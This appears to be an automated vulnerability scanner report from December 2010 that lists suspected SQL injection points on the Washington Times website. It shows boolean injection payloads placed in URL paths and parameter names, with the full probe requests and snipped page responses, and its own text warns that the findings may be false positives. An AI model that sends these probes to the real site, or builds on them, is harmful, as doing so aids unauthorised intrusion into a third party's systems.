GET /multimedia'%20and%201%3d2--%20/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:37:38 GMT X-Varnish: 570590026 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml" ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/child-hostages-freed-france'%20and%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14561 Date: Mon, 13 Dec 2010 21:38:57 GMT X-Varnish: 570592245 Age: 0 Via: 1.1 varnish Connection: close
GET /multimedia/collection/child-hostages-freed-france'%20and%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14520 Date: Mon, 13 Dec 2010 21:39:04 GMT X-Varnish: 570592255 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11241481'%20or%201%3d1--%20 and 11241481'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection11241481'%20or%201%3d1--%20/obamas-celebrate-christmas-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14494 Date: Mon, 13 Dec 2010 21:37:11 GMT X-Varnish: 570589541 Age: 0 Via: 1.1 varnish Connection: close
GET /multimedia/collection11241481'%20or%201%3d2--%20/obamas-celebrate-christmas-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14699 Date: Mon, 13 Dec 2010 21:37:11 GMT X-Varnish: 570589556 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml" ...[SNIP]...
1.12. http://www.washingtontimes.com/multimedia/collection/pope-inaugurates-christmas-season/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19267156%20or%201%3d1--%20 and 19267156%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/pope-inaugurates-christmas-season/?119267156%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 21075 Date: Mon, 13 Dec 2010 21:35:31 GMT X-Varnish: 570586722 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
Pope ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml" ...[SNIP]...
Request 2
GET /multimedia/collection/pope-inaugurates-christmas-season/?119267156%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 20884 Date: Mon, 13 Dec 2010 21:35:33 GMT X-Varnish: 570586931 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
Pope ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="su ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13714572'%20or%201%3d1--%20 and 13714572'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection13714572'%20or%201%3d1--%20/students-protest-british-tuition-hike-plan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14699 Date: Mon, 13 Dec 2010 21:38:02 GMT X-Varnish: 570590898 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http:// ...[SNIP]...
Request 2
GET /multimedia/collection13714572'%20or%201%3d2--%20/students-protest-british-tuition-hike-plan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14669 Date: Mon, 13 Dec 2010 21:38:10 GMT X-Varnish: 570590906 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li class="active blue" id="menu_multimedia"><a href="/multimedia/" class="active" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand? ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 46142550'%20or%201%3d1--%20 and 46142550'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/2010/dec46142550'%20or%201%3d1--%20/12/us-free-traders-sour-on-china/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14639 Date: Mon, 13 Dec 2010 21:30:48 GMT X-Varnish: 570580560 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li class="active blue" id="menu_news"><a href="/" class="active" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand? ...[SNIP]...
Request 2
GET /news/2010/dec46142550'%20or%201%3d2--%20/12/us-free-traders-sour-on-china/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14669 Date: Mon, 13 Dec 2010 21:31:00 GMT X-Varnish: 570580570 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li class="active blue" id="menu_news"><a href="/" class="active" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http:// ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 39115151'%20or%201%3d1--%20 and 39115151'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news39115151'%20or%201%3d1--%20/inside-the-ring/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:27:42 GMT X-Varnish: 570576327 Age: 0 Via: 1.1 varnish Connection: close
GET /news39115151'%20or%201%3d2--%20/inside-the-ring/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:27:55 GMT X-Varnish: 570576641 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17535976'%20or%201%3d1--%20 and 17535976'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news17535976'%20or%201%3d1--%20/pruden-on-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:28:24 GMT X-Varnish: 570577291 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form= ...[SNIP]...
Request 2
GET /news17535976'%20or%201%3d2--%20/pruden-on-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:28:25 GMT X-Varnish: 570577536 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10016926'%20or%201%3d1--%20 and 10016926'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
